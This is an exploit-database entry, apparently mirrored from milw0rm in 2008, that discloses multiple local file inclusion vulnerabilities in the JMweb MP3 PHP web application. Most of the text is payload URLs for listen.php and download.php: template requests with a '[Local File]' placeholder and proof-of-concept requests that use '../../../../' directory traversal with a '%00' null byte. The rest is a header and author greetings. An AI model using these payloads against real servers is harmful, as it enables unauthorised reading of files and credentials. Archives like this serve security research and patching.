exploit-db-mirror/exploits/php/webapps/6669.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

34 lines
No EOL
1,012 B
Text

#################################################################################################
[+] JMweb MP3 (src) Multiple Local File Inclusion
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke,Codex
##################################################################################################
# Script Homepage:
# http://www.jesse-web.co.cc //
[+] Download : http://rapidshare.com/files/138968587/jmweb_audiosearch.zip
[+] Local File Inclusion
Example 1 :
http://[target]/[path]/listen.php?src=[Local File]%00
PoC 1 :
http://127.0.0.1/path/listen.php?src=../../../../autoexec.bat%00
Example 2 :
http://[target]/[path]/download.php?src=[Local File]%00
PoC 2 :
http://127.0.0.1/path/download.php?src=../../../../autoexec.bat%00
##################################################################################################
# milw0rm.com [2008-10-04]